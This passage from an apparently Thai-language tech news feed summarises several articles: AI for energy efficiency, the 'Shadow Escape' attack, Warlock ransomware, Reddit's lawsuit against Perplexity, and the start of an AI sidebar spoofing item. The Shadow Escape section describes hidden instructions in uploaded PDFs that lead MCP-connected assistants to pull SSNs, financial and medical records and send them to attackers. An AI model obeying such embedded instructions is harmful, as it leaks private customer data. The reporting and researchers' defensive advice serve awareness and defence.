    ต้องมีการเชื่อมต่อกับระบบ grid และข้อมูลราคาพลังงานแบบเรียลไทม์
    หากข้อมูลไม่แม่นยำ อาจชาร์จผิดเวลาและเพิ่มค่าไฟ

    3️⃣ ลดมลพิษจากการผลิตน้ำมันและก๊าซ
    วิธีการทำงาน
    AI วิเคราะห์กระบวนการผลิตเพื่อหาจุดที่ปล่อยก๊าซเรือนกระจกมากที่สุด
    ช่วยปรับปรุงกระบวนการให้ปล่อยก๊าซน้อยลง
    ใช้ machine learning เพื่อคาดการณ์และป้องกันการรั่วไหล

    คำเตือน
    ข้อมูลจากอุตสาหกรรมอาจไม่เปิดเผยทั้งหมด ทำให้ AI วิเคราะห์ไม่ครบ
    การพึ่งพา AI โดยไม่มีการตรวจสอบจากมนุษย์อาจเสี่ยงต่อความผิดพลาด

    4️⃣ ควบคุมสัญญาณไฟจราจรเพื่อลดการปล่อยคาร์บอน
    วิธีการทำงาน
    AI วิเคราะห์การจราจรแบบเรียลไทม์เพื่อปรับสัญญาณไฟให้รถติดน้อยลง
    ลดการจอดรอและการเร่งเครื่องที่สิ้นเปลืองพลังงาน
    ช่วยลดการปล่อยคาร์บอนจากรถยนต์ในเมืองใหญ่

    คำเตือน
    ต้องมีระบบกล้องและเซ็นเซอร์ที่ครอบคลุมทั่วเมือง
    หากระบบล่ม อาจทำให้การจราจรแย่ลงกว่าเดิม

    5️⃣ ตรวจสอบและซ่อมบำรุงระบบ HVAC และอุปกรณ์อื่นๆ
    วิธีการทำงาน
    AI ตรวจจับความผิดปกติในระบบก่อนเกิดความเสียหาย
    ช่วยลดการใช้พลังงานจากอุปกรณ์ที่ทำงานผิดปกติ
    ลดค่าใช้จ่ายในการซ่อมแซมระยะยาว

    คำเตือน
    ต้องมีการติดตั้งเซ็นเซอร์และระบบวิเคราะห์ที่แม่นยำ
    หากไม่ calibrate ระบบอย่างสม่ำเสมอ อาจเกิด false alarm หรือพลาดการแจ้งเตือนจริง

    https://www.thestar.com.my/tech/tech-news/2025/10/24/ai-can-help-the-environment-even-though-it-uses-tremendous-energy-here-are-5-ways-how
    🌱 AI กับสิ่งแวดล้อม: ใช้พลังงานมหาศาล แต่ก็ช่วยโลกได้ใน 5 วิธี แม้ปัญญาประดิษฐ์ (AI) จะถูกวิจารณ์ว่าใช้พลังงานและน้ำมหาศาล โดยเฉพาะในศูนย์ข้อมูลที่รองรับการประมวลผลขั้นสูง แต่บทความจาก The Star ชี้ให้เห็นว่า AI ก็สามารถเป็นเครื่องมือสำคัญในการช่วยลดมลพิษและเพิ่มประสิทธิภาพการใช้พลังงานในหลายภาคส่วนได้เช่นกัน นักวิจัยและผู้เชี่ยวชาญเสนอ 5 วิธีที่ AI สามารถช่วยสิ่งแวดล้อมได้ ตั้งแต่การจัดการพลังงานในอาคาร ไปจนถึงการลดการปล่อยก๊าซเรือนกระจกจากการผลิตน้ำมันและการจราจร 🔍 สรุป 5 วิธีที่ AI ช่วยสิ่งแวดล้อม 1️⃣ เพิ่มประสิทธิภาพการใช้พลังงานในอาคาร ✅ วิธีการทำงาน ➡️ AI ปรับแสงสว่าง อุณหภูมิ และการระบายอากาศตามสภาพอากาศและการใช้งานจริง ➡️ คาดว่าช่วยลดการใช้พลังงานในอาคารได้ 10–30% ➡️ ระบบอัตโนมัติช่วยลดการเปิดแอร์หรือฮีตเตอร์เกินความจำเป็น ‼️ คำเตือน ⛔ หากระบบ AI ขัดข้อง อาจทำให้การควบคุมอุณหภูมิผิดพลาด ⛔ ต้องมีการบำรุงรักษาเซ็นเซอร์และระบบควบคุมอย่างสม่ำเสมอ 2️⃣ จัดการการชาร์จอุปกรณ์ไฟฟ้าอย่างมีประสิทธิภาพ ✅ วิธีการทำงาน ➡️ AI กำหนดเวลาชาร์จ EV และสมาร์ตโฟนให้เหมาะกับช่วงที่ไฟฟ้าถูกและสะอาด ➡️ ลดการใช้ไฟฟ้าช่วงพีค และลดการพึ่งพาพลังงานจากฟอสซิล ‼️ คำเตือน ⛔ ต้องมีการเชื่อมต่อกับระบบ grid และข้อมูลราคาพลังงานแบบเรียลไทม์ ⛔ หากข้อมูลไม่แม่นยำ อาจชาร์จผิดเวลาและเพิ่มค่าไฟ 3️⃣ ลดมลพิษจากการผลิตน้ำมันและก๊าซ ✅ วิธีการทำงาน ➡️ AI วิเคราะห์กระบวนการผลิตเพื่อหาจุดที่ปล่อยก๊าซเรือนกระจกมากที่สุด ➡️ ช่วยปรับปรุงกระบวนการให้ปล่อยก๊าซน้อยลง ➡️ ใช้ machine learning เพื่อคาดการณ์และป้องกันการรั่วไหล ‼️ คำเตือน ⛔ ข้อมูลจากอุตสาหกรรมอาจไม่เปิดเผยทั้งหมด ทำให้ AI วิเคราะห์ไม่ครบ ⛔ การพึ่งพา AI โดยไม่มีการตรวจสอบจากมนุษย์อาจเสี่ยงต่อความผิดพลาด 4️⃣ ควบคุมสัญญาณไฟจราจรเพื่อลดการปล่อยคาร์บอน ✅ วิธีการทำงาน ➡️ AI วิเคราะห์การจราจรแบบเรียลไทม์เพื่อปรับสัญญาณไฟให้รถติดน้อยลง ➡️ ลดการจอดรอและการเร่งเครื่องที่สิ้นเปลืองพลังงาน ➡️ ช่วยลดการปล่อยคาร์บอนจากรถยนต์ในเมืองใหญ่ ‼️ คำเตือน ⛔ ต้องมีระบบกล้องและเซ็นเซอร์ที่ครอบคลุมทั่วเมือง ⛔ หากระบบล่ม อาจทำให้การจราจรแย่ลงกว่าเดิม 5️⃣ ตรวจสอบและซ่อมบำรุงระบบ HVAC และอุปกรณ์อื่นๆ ✅ วิธีการทำงาน ➡️ AI ตรวจจับความผิดปกติในระบบก่อนเกิดความเสียหาย ➡️ ช่วยลดการใช้พลังงานจากอุปกรณ์ที่ทำงานผิดปกติ ➡️ ลดค่าใช้จ่ายในการซ่อมแซมระยะยาว ‼️ คำเตือน ⛔ ต้องมีการติดตั้งเซ็นเซอร์และระบบวิเคราะห์ที่แม่นยำ ⛔ หากไม่ calibrate ระบบอย่างสม่ำเสมอ อาจเกิด false alarm หรือพลาดการแจ้งเตือนจริง https://www.thestar.com.my/tech/tech-news/2025/10/24/ai-can-help-the-environment-even-though-it-uses-tremendous-energy-here-are-5-ways-how
    WWW.THESTAR.COM.MY
    AI can help the environment, even though it uses tremendous energy. Here are 5 ways how
    Artificial intelligence has caused concern for its tremendous consumptionof water and power. But scientists are also experimenting with ways that AI can help people and businesses use energy more efficiently and pollute less.
    0 Comments 0 Shares 45 Views 0 Reviews
  • Shadow Escape: ช่องโหว่ใหม่ใน AI Assistant เสี่ยงทำข้อมูลผู้ใช้รั่วไหลมหาศาล

    นักวิจัยจาก Operant AI ได้เปิดเผยการโจมตีแบบใหม่ที่เรียกว่า “Shadow Escape” ซึ่งเป็นการโจมตีแบบ “zero-click” ที่สามารถขโมยข้อมูลส่วนตัวของผู้ใช้ผ่าน AI Assistant โดยไม่ต้องให้ผู้ใช้คลิกหรือตอบสนองใดๆ เลย จุดอ่อนนี้เกิดจากการใช้มาตรฐาน Model Context Protocol (MCP) ที่ช่วยให้ AI อย่าง ChatGPT, Gemini และ Claude เชื่อมต่อกับระบบภายในขององค์กร เช่น ฐานข้อมูลหรือ API ต่างๆ

    สิ่งที่น่ากังวลคือ Shadow Escape สามารถซ่อนคำสั่งอันตรายไว้ในไฟล์ธรรมดา เช่น คู่มือพนักงานหรือ PDF ที่ดูไม่มีพิษภัย เมื่อพนักงานอัปโหลดไฟล์เหล่านี้ให้ AI ช่วยสรุปหรือวิเคราะห์ คำสั่งที่ซ่อนอยู่จะสั่งให้ AI ดึงข้อมูลส่วนตัวของลูกค้า เช่น หมายเลขประกันสังคม (SSN), ข้อมูลการเงิน, หรือเวชระเบียน แล้วส่งออกไปยังเซิร์ฟเวอร์ของผู้ไม่หวังดี โดยที่ระบบความปลอดภัยทั่วไปไม่สามารถตรวจจับได้ เพราะการเข้าถึงข้อมูลเกิดขึ้นภายในระบบที่ได้รับอนุญาตอยู่แล้ว

    1️⃣ ลักษณะของการโจมตี
    จุดเริ่มต้นของการโจมตี
    ใช้ไฟล์ธรรมดา เช่น PDF หรือเอกสาร Word ที่ฝังคำสั่งลับ
    พนักงานอัปโหลดไฟล์ให้ AI ช่วยสรุปหรือวิเคราะห์
    คำสั่งลับจะสั่งให้ AI ดึงข้อมูลจากระบบภายใน

    จุดอ่อนที่ถูกใช้
    มาตรฐาน Model Context Protocol (MCP) ที่เชื่อม AI กับระบบองค์กร
    การตั้งค่า permission ของ MCP ที่ไม่รัดกุม
    AI มีสิทธิ์เข้าถึงข้อมูลโดยตรง จึงไม่ถูกระบบรักษาความปลอดภัยภายนอกตรวจจับ

    2️⃣ ข้อมูลที่ตกอยู่ในความเสี่ยง
    ประเภทของข้อมูลที่อาจรั่วไหล
    หมายเลขประกันสังคม (SSN)
    ข้อมูลบัตรเครดิตและบัญชีธนาคาร
    เวชระเบียนและข้อมูลสุขภาพ
    ชื่อ ที่อยู่ และข้อมูลส่วนตัวของลูกค้า

    คำเตือน
    การรั่วไหลอาจเกิดขึ้นโดยที่พนักงานไม่รู้ตัว
    ข้อมูลอาจถูกส่งออกไปยังเซิร์ฟเวอร์ของผู้โจมตีโดยไม่มีการแจ้งเตือน

    3️⃣ ทำไมระบบความปลอดภัยทั่วไปจึงไม่สามารถป้องกันได้
    ลักษณะของการโจมตีแบบ “zero-click”
    ไม่ต้องการให้ผู้ใช้คลิกลิงก์หรือทำอะไร
    ใช้ AI ที่มีสิทธิ์เข้าถึงข้อมูลเป็นเครื่องมือในการขโมยข้อมูล
    การส่งข้อมูลออกถูกพรางให้ดูเหมือนเป็นการทำงานปกติของระบบ

    คำเตือน
    ระบบ firewall และระบบตรวจจับภัยคุกคามทั่วไปไม่สามารถแยกแยะพฤติกรรมนี้ได้
    การใช้ AI โดยไม่มีการควบคุมสิทธิ์อย่างเข้มงวด อาจกลายเป็นช่องโหว่ร้ายแรง

    4️⃣ ข้อเสนอแนะจากนักวิจัย
    แนวทางป้องกัน
    ตรวจสอบและจำกัดสิทธิ์ของ AI Assistant ในการเข้าถึงข้อมูล
    ปรับแต่ง permission ของ MCP ให้เหมาะสมกับระดับความเสี่ยง
    ตรวจสอบไฟล์ที่อัปโหลดเข้าระบบอย่างละเอียดก่อนให้ AI ประมวลผล

    คำเตือน
    องค์กรที่ใช้ AI Assistant โดยไม่ตรวจสอบการตั้งค่า MCP อาจตกเป็นเหยื่อได้ง่าย
    การละเลยการ audit ระบบ AI อาจนำไปสู่การรั่วไหลของข้อมูลระดับ “หลายล้านล้านรายการ”

    https://hackread.com/shadow-escape-0-click-attack-ai-assistants-risk/
    🕵️‍♂️ Shadow Escape: ช่องโหว่ใหม่ใน AI Assistant เสี่ยงทำข้อมูลผู้ใช้รั่วไหลมหาศาล นักวิจัยจาก Operant AI ได้เปิดเผยการโจมตีแบบใหม่ที่เรียกว่า “Shadow Escape” ซึ่งเป็นการโจมตีแบบ “zero-click” ที่สามารถขโมยข้อมูลส่วนตัวของผู้ใช้ผ่าน AI Assistant โดยไม่ต้องให้ผู้ใช้คลิกหรือตอบสนองใดๆ เลย จุดอ่อนนี้เกิดจากการใช้มาตรฐาน Model Context Protocol (MCP) ที่ช่วยให้ AI อย่าง ChatGPT, Gemini และ Claude เชื่อมต่อกับระบบภายในขององค์กร เช่น ฐานข้อมูลหรือ API ต่างๆ สิ่งที่น่ากังวลคือ Shadow Escape สามารถซ่อนคำสั่งอันตรายไว้ในไฟล์ธรรมดา เช่น คู่มือพนักงานหรือ PDF ที่ดูไม่มีพิษภัย เมื่อพนักงานอัปโหลดไฟล์เหล่านี้ให้ AI ช่วยสรุปหรือวิเคราะห์ คำสั่งที่ซ่อนอยู่จะสั่งให้ AI ดึงข้อมูลส่วนตัวของลูกค้า เช่น หมายเลขประกันสังคม (SSN), ข้อมูลการเงิน, หรือเวชระเบียน แล้วส่งออกไปยังเซิร์ฟเวอร์ของผู้ไม่หวังดี โดยที่ระบบความปลอดภัยทั่วไปไม่สามารถตรวจจับได้ เพราะการเข้าถึงข้อมูลเกิดขึ้นภายในระบบที่ได้รับอนุญาตอยู่แล้ว 1️⃣ ลักษณะของการโจมตี ✅ จุดเริ่มต้นของการโจมตี ➡️ ใช้ไฟล์ธรรมดา เช่น PDF หรือเอกสาร Word ที่ฝังคำสั่งลับ ➡️ พนักงานอัปโหลดไฟล์ให้ AI ช่วยสรุปหรือวิเคราะห์ ➡️ คำสั่งลับจะสั่งให้ AI ดึงข้อมูลจากระบบภายใน ✅ จุดอ่อนที่ถูกใช้ ➡️ มาตรฐาน Model Context Protocol (MCP) ที่เชื่อม AI กับระบบองค์กร ➡️ การตั้งค่า permission ของ MCP ที่ไม่รัดกุม ➡️ AI มีสิทธิ์เข้าถึงข้อมูลโดยตรง จึงไม่ถูกระบบรักษาความปลอดภัยภายนอกตรวจจับ 2️⃣ ข้อมูลที่ตกอยู่ในความเสี่ยง ✅ ประเภทของข้อมูลที่อาจรั่วไหล ➡️ หมายเลขประกันสังคม (SSN) ➡️ ข้อมูลบัตรเครดิตและบัญชีธนาคาร ➡️ เวชระเบียนและข้อมูลสุขภาพ ➡️ ชื่อ ที่อยู่ และข้อมูลส่วนตัวของลูกค้า ‼️ คำเตือน ⛔ การรั่วไหลอาจเกิดขึ้นโดยที่พนักงานไม่รู้ตัว ⛔ ข้อมูลอาจถูกส่งออกไปยังเซิร์ฟเวอร์ของผู้โจมตีโดยไม่มีการแจ้งเตือน 3️⃣ ทำไมระบบความปลอดภัยทั่วไปจึงไม่สามารถป้องกันได้ ✅ ลักษณะของการโจมตีแบบ “zero-click” ➡️ ไม่ต้องการให้ผู้ใช้คลิกลิงก์หรือทำอะไร ➡️ ใช้ AI ที่มีสิทธิ์เข้าถึงข้อมูลเป็นเครื่องมือในการขโมยข้อมูล ➡️ การส่งข้อมูลออกถูกพรางให้ดูเหมือนเป็นการทำงานปกติของระบบ ‼️ คำเตือน ⛔ ระบบ firewall และระบบตรวจจับภัยคุกคามทั่วไปไม่สามารถแยกแยะพฤติกรรมนี้ได้ ⛔ การใช้ AI โดยไม่มีการควบคุมสิทธิ์อย่างเข้มงวด อาจกลายเป็นช่องโหว่ร้ายแรง 4️⃣ ข้อเสนอแนะจากนักวิจัย ✅ แนวทางป้องกัน ➡️ ตรวจสอบและจำกัดสิทธิ์ของ AI Assistant ในการเข้าถึงข้อมูล ➡️ ปรับแต่ง permission ของ MCP ให้เหมาะสมกับระดับความเสี่ยง ➡️ ตรวจสอบไฟล์ที่อัปโหลดเข้าระบบอย่างละเอียดก่อนให้ AI ประมวลผล ‼️ คำเตือน ⛔ องค์กรที่ใช้ AI Assistant โดยไม่ตรวจสอบการตั้งค่า MCP อาจตกเป็นเหยื่อได้ง่าย ⛔ การละเลยการ audit ระบบ AI อาจนำไปสู่การรั่วไหลของข้อมูลระดับ “หลายล้านล้านรายการ” https://hackread.com/shadow-escape-0-click-attack-ai-assistants-risk/
    HACKREAD.COM
    Shadow Escape 0-Click Attack in AI Assistants Puts Trillions of Records at Risk
    Follow us on Bluesky, Twitter (X), Mastodon and Facebook at @Hackread
    0 Comments 0 Shares 63 Views 0 Reviews
  • Warlock Ransomware: จู่โจมองค์กรสหรัฐฯ ผ่านช่องโหว่ SharePoint โดยกลุ่มแฮกเกอร์จีน CamoFei

    ภัยคุกคามไซเบอร์ครั้งใหม่กำลังเขย่าโลกธุรกิจสหรัฐฯ เมื่อ Warlock ransomware ปรากฏตัวในเดือนมิถุนายน 2025 และถูกใช้ในการโจมตีองค์กรต่างๆ โดยอาศัยช่องโหว่ ToolShell zero-day ใน Microsoft SharePoint (CVE-2025-53770) ซึ่งสามารถเจาะระบบได้โดยไม่ต้องยืนยันตัวตน

    สิ่งที่ทำให้ Warlock แตกต่างจาก ransomware ทั่วไปคือความเชื่อมโยงกับกลุ่มแฮกเกอร์จีนสายข่าวกรอง เช่น CamoFei (หรือ ChamelGang) และ Storm-2603 ซึ่งเคยใช้เครื่องมือจารกรรมอย่าง Cobalt Strike และเทคนิค DLL sideloading ในการแทรกซึมระบบมาก่อน

    Warlock ถูกพบว่ามีลักษณะคล้ายกับ Anylock ransomware โดยใช้ extension .x2anylock และมีโครงสร้าง payload ที่ใกล้เคียงกัน บ่งชี้ว่าอาจเป็นการรีแบรนด์หรือพัฒนาต่อยอดจาก LockBit 3.0

    หนึ่งในเทคนิคที่น่ากังวลที่สุดคือการใช้ BYOVD (Bring Your Own Vulnerable Driver) โดยแฮกเกอร์นำ driver จาก Baidu Antivirus ปี 2016 ที่มีช่องโหว่มาใช้ร่วมกับ certificate ปลอมจากนักพัฒนาชื่อ “coolschool” เพื่อปิดการทำงานของโปรแกรมป้องกันไวรัสในระบบเป้าหมาย

    การโจมตีครั้งนี้ไม่ใช่แค่การเรียกค่าไถ่ แต่ยังสะท้อนถึงการบูรณาการระหว่างกลุ่มแฮกเกอร์สายข่าวกรองกับกลุ่มอาชญากรรมไซเบอร์ ซึ่งอาจเป็นยุทธศาสตร์ใหม่ของการโจมตีระดับประเทศ

    ลักษณะของ Warlock ransomware
    ปรากฏตัวครั้งแรกในเดือนมิถุนายน 2025
    ใช้ช่องโหว่ CVE-2025-53770 ใน SharePoint
    เชื่อมโยงกับกลุ่มแฮกเกอร์จีน เช่น CamoFei และ Storm-2603

    เทคนิคการโจมตี
    ใช้ BYOVD ด้วย driver จาก Baidu Antivirus ปี 2016
    ใช้ certificate ปลอมจากนักพัฒนาชื่อ “coolschool”
    ใช้ DLL sideloading และ toolkit “Project AK47”

    ความสัมพันธ์กับ ransomware อื่น
    มีลักษณะคล้าย Anylock และ LockBit 3.0
    ใช้ extension .x2anylock ในการเข้ารหัสไฟล์
    อาจเป็นการรีแบรนด์หรือพัฒนาต่อยอดจาก ransomware เดิม

    กลุ่มเป้าหมาย
    องค์กรในสหรัฐฯ และหน่วยงานรัฐบาล
    ใช้ช่องโหว่ zero-day เพื่อเข้าถึงระบบโดยไม่ต้องยืนยันตัวตน
    มีการโจมตีแบบผสมระหว่างจารกรรมและเรียกค่าไถ่

    https://securityonline.info/warlock-ransomware-hits-us-firms-exploiting-sharepoint-zero-day-linked-to-chinas-camofei-apt/
    🧨 Warlock Ransomware: จู่โจมองค์กรสหรัฐฯ ผ่านช่องโหว่ SharePoint โดยกลุ่มแฮกเกอร์จีน CamoFei ภัยคุกคามไซเบอร์ครั้งใหม่กำลังเขย่าโลกธุรกิจสหรัฐฯ เมื่อ Warlock ransomware ปรากฏตัวในเดือนมิถุนายน 2025 และถูกใช้ในการโจมตีองค์กรต่างๆ โดยอาศัยช่องโหว่ ToolShell zero-day ใน Microsoft SharePoint (CVE-2025-53770) ซึ่งสามารถเจาะระบบได้โดยไม่ต้องยืนยันตัวตน สิ่งที่ทำให้ Warlock แตกต่างจาก ransomware ทั่วไปคือความเชื่อมโยงกับกลุ่มแฮกเกอร์จีนสายข่าวกรอง เช่น CamoFei (หรือ ChamelGang) และ Storm-2603 ซึ่งเคยใช้เครื่องมือจารกรรมอย่าง Cobalt Strike และเทคนิค DLL sideloading ในการแทรกซึมระบบมาก่อน Warlock ถูกพบว่ามีลักษณะคล้ายกับ Anylock ransomware โดยใช้ extension .x2anylock และมีโครงสร้าง payload ที่ใกล้เคียงกัน บ่งชี้ว่าอาจเป็นการรีแบรนด์หรือพัฒนาต่อยอดจาก LockBit 3.0 หนึ่งในเทคนิคที่น่ากังวลที่สุดคือการใช้ BYOVD (Bring Your Own Vulnerable Driver) โดยแฮกเกอร์นำ driver จาก Baidu Antivirus ปี 2016 ที่มีช่องโหว่มาใช้ร่วมกับ certificate ปลอมจากนักพัฒนาชื่อ “coolschool” เพื่อปิดการทำงานของโปรแกรมป้องกันไวรัสในระบบเป้าหมาย การโจมตีครั้งนี้ไม่ใช่แค่การเรียกค่าไถ่ แต่ยังสะท้อนถึงการบูรณาการระหว่างกลุ่มแฮกเกอร์สายข่าวกรองกับกลุ่มอาชญากรรมไซเบอร์ ซึ่งอาจเป็นยุทธศาสตร์ใหม่ของการโจมตีระดับประเทศ ✅ ลักษณะของ Warlock ransomware ➡️ ปรากฏตัวครั้งแรกในเดือนมิถุนายน 2025 ➡️ ใช้ช่องโหว่ CVE-2025-53770 ใน SharePoint ➡️ เชื่อมโยงกับกลุ่มแฮกเกอร์จีน เช่น CamoFei และ Storm-2603 ✅ เทคนิคการโจมตี ➡️ ใช้ BYOVD ด้วย driver จาก Baidu Antivirus ปี 2016 ➡️ ใช้ certificate ปลอมจากนักพัฒนาชื่อ “coolschool” ➡️ ใช้ DLL sideloading และ toolkit “Project AK47” ✅ ความสัมพันธ์กับ ransomware อื่น ➡️ มีลักษณะคล้าย Anylock และ LockBit 3.0 ➡️ ใช้ extension .x2anylock ในการเข้ารหัสไฟล์ ➡️ อาจเป็นการรีแบรนด์หรือพัฒนาต่อยอดจาก ransomware เดิม ✅ กลุ่มเป้าหมาย ➡️ องค์กรในสหรัฐฯ และหน่วยงานรัฐบาล ➡️ ใช้ช่องโหว่ zero-day เพื่อเข้าถึงระบบโดยไม่ต้องยืนยันตัวตน ➡️ มีการโจมตีแบบผสมระหว่างจารกรรมและเรียกค่าไถ่ https://securityonline.info/warlock-ransomware-hits-us-firms-exploiting-sharepoint-zero-day-linked-to-chinas-camofei-apt/
    SECURITYONLINE.INFO
    Warlock Ransomware Hits US Firms Exploiting SharePoint Zero-Day, Linked to China’s CamoFei APT
    Symantec exposed Warlock ransomware (a probable Anylock rebrand) used by China-linked Storm-2603. It exploits the SharePoint zero-day and BYOVD to disable security and encrypt files with the .x2anylock extension.
    0 Comments 0 Shares 62 Views 0 Reviews
  • Reddit ฟ้อง Perplexity และบริษัท Data Broker ฐานขูดข้อมูลระดับอุตสาหกรรมเพื่อป้อน AI

    Reddit จุดชนวนสงครามข้อมูลกับบริษัท AI โดยยื่นฟ้อง Perplexity และบริษัท data broker อีก 3 ราย ได้แก่ Oxylabs, SerpApi และ AWMProxy ฐานละเมิดข้อตกลงการใช้งานและขูดข้อมูลจากแพลตฟอร์ม Reddit เพื่อนำไปใช้ในการฝึกโมเดล AI โดยไม่ได้รับอนุญาต

    Reddit ระบุว่า Perplexity เป็น “ลูกค้าผู้เต็มใจ” ในระบบเศรษฐกิจแบบ “ฟอกข้อมูล” ที่กำลังเฟื่องฟูในยุค AI โดยบริษัทเหล่านี้ใช้เทคนิคหลบเลี่ยงข้อจำกัดของเว็บไซต์ เช่น การละเมิด robots.txt และการปลอมตัวเป็นผู้ใช้ทั่วไป เพื่อเข้าถึงข้อมูลที่ควรถูกป้องกันไว้

    ที่น่าสนใจคือ Reddit ได้วางกับดักโดยสร้างโพสต์ลับที่มีเพียง Google เท่านั้นที่สามารถเข้าถึงได้ แต่กลับพบว่าเนื้อหานั้นปรากฏในคำตอบของ Perplexity ภายในเวลาไม่กี่ชั่วโมง ซึ่งเป็นหลักฐานสำคัญที่ Reddit ใช้ในการฟ้องร้อง

    Perplexity ปฏิเสธข้อกล่าวหา โดยระบุว่าไม่ได้ใช้ข้อมูล Reddit ในการฝึกโมเดล AI แต่เพียงสรุปและอ้างอิงเนื้อหาสาธารณะเท่านั้น พร้อมกล่าวหาว่า Reddit ใช้คดีนี้เป็นเครื่องมือในการต่อรองข้อตกลงด้านข้อมูลกับ Google และ OpenAI

    คดีนี้ไม่ใช่ครั้งแรกที่ Reddit ฟ้องบริษัท AI ก่อนหน้านี้ก็เคยฟ้อง Anthropic ด้วยเหตุผลคล้ายกัน และสะท้อนถึงความตึงเครียดระหว่างแพลตฟอร์มเนื้อหากับบริษัท AI ที่ต้องการข้อมูลมนุษย์คุณภาพสูงเพื่อฝึกโมเดล

    รายละเอียดคดีฟ้องร้อง
    Reddit ฟ้อง Perplexity, Oxylabs, SerpApi และ AWMProxy ฐานขูดข้อมูลโดยไม่ได้รับอนุญาต
    กล่าวหาว่า Perplexity ใช้ข้อมูล Reddit เพื่อฝึกโมเดล AI โดยไม่ทำข้อตกลงลิขสิทธิ์
    บริษัท scraping ใช้ proxy และเทคนิคหลบเลี่ยงเพื่อเข้าถึงข้อมูล

    หลักฐานสำคัญ
    Reddit สร้างโพสต์ลับที่มีเฉพาะ Google เข้าถึงได้
    พบว่า Perplexity ใช้เนื้อหานั้นในคำตอบของ AI ภายในไม่กี่ชั่วโมง
    ชี้ว่า Perplexity ขูดข้อมูลจาก Google SERPs ที่มีเนื้อหา Reddit

    การตอบโต้จาก Perplexity
    ปฏิเสธว่าไม่ได้ฝึกโมเดลด้วยข้อมูล Reddit
    ระบุว่าเพียงสรุปและอ้างอิงเนื้อหาสาธารณะ
    กล่าวหาว่า Redditใช้คดีนี้เพื่อกดดัน Google และ OpenAI

    ความเคลื่อนไหวของ Reddit
    เคยฟ้อง Anthropic ด้วยเหตุผลคล้ายกัน
    มีข้อตกลงลิขสิทธิ์กับ Google และ OpenAI
    เน้นว่าข้อมูลจาก Reddit เป็น “เนื้อหามนุษย์คุณภาพสูง” ที่มีมูลค่าสูงในยุค AI

    https://securityonline.info/reddit-sues-perplexity-and-data-brokers-for-industrial-scale-scraping/
    🧠 Reddit ฟ้อง Perplexity และบริษัท Data Broker ฐานขูดข้อมูลระดับอุตสาหกรรมเพื่อป้อน AI Reddit จุดชนวนสงครามข้อมูลกับบริษัท AI โดยยื่นฟ้อง Perplexity และบริษัท data broker อีก 3 ราย ได้แก่ Oxylabs, SerpApi และ AWMProxy ฐานละเมิดข้อตกลงการใช้งานและขูดข้อมูลจากแพลตฟอร์ม Reddit เพื่อนำไปใช้ในการฝึกโมเดล AI โดยไม่ได้รับอนุญาต Reddit ระบุว่า Perplexity เป็น “ลูกค้าผู้เต็มใจ” ในระบบเศรษฐกิจแบบ “ฟอกข้อมูล” ที่กำลังเฟื่องฟูในยุค AI โดยบริษัทเหล่านี้ใช้เทคนิคหลบเลี่ยงข้อจำกัดของเว็บไซต์ เช่น การละเมิด robots.txt และการปลอมตัวเป็นผู้ใช้ทั่วไป เพื่อเข้าถึงข้อมูลที่ควรถูกป้องกันไว้ ที่น่าสนใจคือ Reddit ได้วางกับดักโดยสร้างโพสต์ลับที่มีเพียง Google เท่านั้นที่สามารถเข้าถึงได้ แต่กลับพบว่าเนื้อหานั้นปรากฏในคำตอบของ Perplexity ภายในเวลาไม่กี่ชั่วโมง ซึ่งเป็นหลักฐานสำคัญที่ Reddit ใช้ในการฟ้องร้อง Perplexity ปฏิเสธข้อกล่าวหา โดยระบุว่าไม่ได้ใช้ข้อมูล Reddit ในการฝึกโมเดล AI แต่เพียงสรุปและอ้างอิงเนื้อหาสาธารณะเท่านั้น พร้อมกล่าวหาว่า Reddit ใช้คดีนี้เป็นเครื่องมือในการต่อรองข้อตกลงด้านข้อมูลกับ Google และ OpenAI คดีนี้ไม่ใช่ครั้งแรกที่ Reddit ฟ้องบริษัท AI ก่อนหน้านี้ก็เคยฟ้อง Anthropic ด้วยเหตุผลคล้ายกัน และสะท้อนถึงความตึงเครียดระหว่างแพลตฟอร์มเนื้อหากับบริษัท AI ที่ต้องการข้อมูลมนุษย์คุณภาพสูงเพื่อฝึกโมเดล ✅ รายละเอียดคดีฟ้องร้อง ➡️ Reddit ฟ้อง Perplexity, Oxylabs, SerpApi และ AWMProxy ฐานขูดข้อมูลโดยไม่ได้รับอนุญาต ➡️ กล่าวหาว่า Perplexity ใช้ข้อมูล Reddit เพื่อฝึกโมเดล AI โดยไม่ทำข้อตกลงลิขสิทธิ์ ➡️ บริษัท scraping ใช้ proxy และเทคนิคหลบเลี่ยงเพื่อเข้าถึงข้อมูล ✅ หลักฐานสำคัญ ➡️ Reddit สร้างโพสต์ลับที่มีเฉพาะ Google เข้าถึงได้ ➡️ พบว่า Perplexity ใช้เนื้อหานั้นในคำตอบของ AI ภายในไม่กี่ชั่วโมง ➡️ ชี้ว่า Perplexity ขูดข้อมูลจาก Google SERPs ที่มีเนื้อหา Reddit ✅ การตอบโต้จาก Perplexity ➡️ ปฏิเสธว่าไม่ได้ฝึกโมเดลด้วยข้อมูล Reddit ➡️ ระบุว่าเพียงสรุปและอ้างอิงเนื้อหาสาธารณะ ➡️ กล่าวหาว่า Redditใช้คดีนี้เพื่อกดดัน Google และ OpenAI ✅ ความเคลื่อนไหวของ Reddit ➡️ เคยฟ้อง Anthropic ด้วยเหตุผลคล้ายกัน ➡️ มีข้อตกลงลิขสิทธิ์กับ Google และ OpenAI ➡️ เน้นว่าข้อมูลจาก Reddit เป็น “เนื้อหามนุษย์คุณภาพสูง” ที่มีมูลค่าสูงในยุค AI https://securityonline.info/reddit-sues-perplexity-and-data-brokers-for-industrial-scale-scraping/
    SECURITYONLINE.INFO
    Reddit Sues Perplexity and Data Brokers for 'Industrial-Scale' Scraping
    Reddit has filed a lawsuit against Perplexity and three data brokers, accusing them of unauthorized, "industrial-scale" scraping of its content for AI training.
    0 Comments 0 Shares 39 Views 0 Reviews
  • AI Sidebar Spoofing: SquareX เตือนภัยส่วนขยายปลอมที่แอบอ้างเป็น Sidebar ของ AI Browser

    SquareX บริษัทด้านความปลอดภัยเบราว์เซอร์ ได้เปิดเผยการโจมตีรูปแบบใหม่ที่เรียกว่า “AI Sidebar Spoofing” ซึ่งใช้ส่วนขยายเบราว์เซอร์ที่เป็นอันตรายในการปลอมแปลงหน้าต่าง Sidebar ของ AI browser เช่น Comet, Brave, Edge และ Firefox เพื่อหลอกผู้ใช้ให้ทำตามคำสั่งที่เป็นอันตรายโดยเข้าใจผิดว่าเป็นคำแนะนำจาก AI จริง

